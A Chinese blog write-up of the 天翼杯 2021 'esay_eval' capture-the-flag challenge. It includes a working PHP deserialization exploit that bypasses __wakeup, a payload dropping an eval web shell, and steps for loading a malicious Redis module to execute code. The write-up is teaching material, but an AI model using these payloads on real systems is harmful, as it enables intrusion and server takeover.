[天翼杯 2021]esay_eval

最新推荐文章于 2023-10-09 09:29:19 发布
最新推荐文章于 2023-10-09 09:29:19 发布
阅读量498 收藏 1
点赞数 3
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/125211648
版权

进入页面,得到源码

<?php
class A{
    public $code = "";
    function __call($method,$args){
        eval($this->code);
        
    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);    
    }


}else{
    highlight_file(__FILE__);
}

分析一下关键代码

preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);

这里把匹配到[AB]:(任意): 到$ret里面 $ret的内容就是就是(任意)

因为这里不能让$ret匹配到内容,所以要让$ret为空

因为类不区分大小写,我们反序化的时候可以把AB改成小写ab

我们先试一下能不能触发phpinfo();

<?php
class a{
    public $code = "";

    function __construct(){
        $this->code = "phpinfo();";
    }
}
class b{
    function __construct(){
        $this->a=new a();
    }
}

$str = serialize(new b());
$str1 = preg_replace('/"b":1:/','"b":2:',$str);
echo urlencode($str1);

 

发现可以,那就是构造序列化了(写一句话木马进去)

<?php
class a{
    public $code = "";

    function __construct(){
        $this->code = "fputs(fopen('shell.php','w'),base64_decode(\"PD9waHAgZXZhbCgkX1JFUVVFU1RbOF0pOw==\"));";
    }
}
class b{
    function __construct(){
        $this->a=new a();
    }
}

$str = serialize(new b());
$str1 = preg_replace('/"b":1:/','"b":2:',$str);
echo urlencode($str1);

这里把b:1替换成b:2因为我们要绕过__wakeup所以要让变量个数大于实际个数就可以绕过

把得到的传参到poc=O%3A1%3A%22b%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A1%3A%22a%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A84%3A%22fputs%28fopen%28%27shell.php%27%2C%27w%27%29%2Cbase64_decode%28%22PD9waHAgZXZhbCgkX1JFUVVFU1RbOF0pOw%3D%3D%22%29%29%3B%22%3B%7D%7D

然后访问shell.php

连接蚁剑

 因为这里对目录访问设置了限定,所以我们只能在/var/www/html/这个目录下做文章,这里发现里面有一个config.php.swp

点进去看

redis的连接,这个是密码,所以我们要上传一下连接redis的文件 

链接文件:exp.so

下载了之后,把里面的exp.so传到目录里面,然后利用redis管理工具ssrf

 

可能有些人没有redis工具,这里给大家一个链接:redis管理工具 

下载完记得把他解压到图示目录 

然后进入 

在配置列表里面添加一下

 输入MODULE LOAD 加载一下恶意脚本

再拿我们想要的flag

 

 

 

清风--
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021 天翼easy_eval
m0_56059226的博客
10-04 2345
打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt
[天翼 2021]esay_eval(复现)
qq_53460654的博客
12-17 3041
<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a();
esay-markdown:简单的markdown解析
05-08
Markdown是一种轻量级的标记语言,它允许人们使用易读易写的纯文本格式编写文档,然后转换成结构化...如果你在项目中遇到Markdown解析的需求,`esay-markdown`可能是很好的选择,只需按照库的文档指示引入和使用即可。
choya-lee#esay-python#继承1
07-25
1.1 继承的概念、语法和特点 1.2 方法的重写 1.3 父类的 私有属性 和 私有方法 2.1 多继承的使用注意事项 2.2 新式类与旧式(经典)类
易学C++,ESAY C++
04-03
个人觉的这是一本讲的很好的C++书,适合新手。
S7-1200_PLC_EASY_PLUS_V4.2
08-09
西门子S7-1200学习手册chm版本
PyPI 官网下载 | django-esay-account-0.0.3.tar.gz
01-10
**PyPI 官网下载 | django-esay-account-0.0.3.tar.gz** 在Python的世界里,PyPI(Python Package Index)是官方的第三方软件包仓库,它为Python开发者提供了一个集中化的地方来发布、查找和安装软件包。本资源`...
『CTF Web复现』[2021 天翼]easy_eval
Ho1aAs‘s Blog
09-23 1121
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
[天翼 2021]esay_eval复现
cosmoslin的博客
12-01 3392
考点 反序列化绕过wakeup魔术方法 Redis加载恶意so文件获取shell 解题 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __d
[天翼 2021]esay_eval-----记Redis提权
qq_73767109的博客
06-25 154
一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。Vim缓存泄露指的是当用户在Vim编辑器中打开了一个文件,并进行了修改,然后使用了Vim或其他工具关闭了该文件,但Vim缓存中仍然保留着该文件的副本,从而导致该文件中的敏感信息(例如密码、私密密钥等)泄露的漏洞。
[天翼 2021]esay_eval - RCE(disabled_function绕过||AS_Redis绕过)+反序列化(大小写&wakeup绕过)
最新发布
oZuoShen123的博客
10-09 775
1、看代码,有unserialize函数,说明要反序列化 2、有 eval($this->code) ,说明要RCE 3、有preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);,说明要绕过waf 4、A的wakeup里面会把code置空,所以要绕过 起点:B(destruct)  终点:A(call) 链条:B(destruct::a=$a)-> A(call::code=命令)
天翼easy_eval复现
weixin_44687621的博客
09-25 1496
最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。 本地环境的搭建 本地环境涉及到php的web服务、redis数据库。 Dockerfile的编写 FROM ubuntu:16.04 COPY src/sources.list /etc/apt/sources.list COPY src/redis-4.0.9 /home/redis-4.0.9 RUN apt-get update && \ apt-get install -y curl \
esay excel
09-02
EasyExcel是一个基于Java的开源项目,用于简化读写Excel的操作。它在尽可能节约内存的情况下,支持读写百M级别的Excel文件。相比于其他的Java处理Excel的框架,如Apache POI和jxl,EasyExcel具有更低的内存消耗。传统的框架在处理大型Excel文件时往往会出现内存溢出的问题,而EasyExcel通过重写POI对07版Excel的解析方式,将原本需要几十MB甚至几百MB的内存消耗降低到几KB级别。因此,EasyExcel是一个更加高效、省内存的Java处理Excel的工具。需要注意的是,EasyExcel目前不支持图片读取,并且对导出Excel样式、读写规则要求较为严格,对于这些需求较高的情况,建议使用POI框架。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [EsayExcel技术分享](https://blog.csdn.net/CuiGongZi/article/details/124800675)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值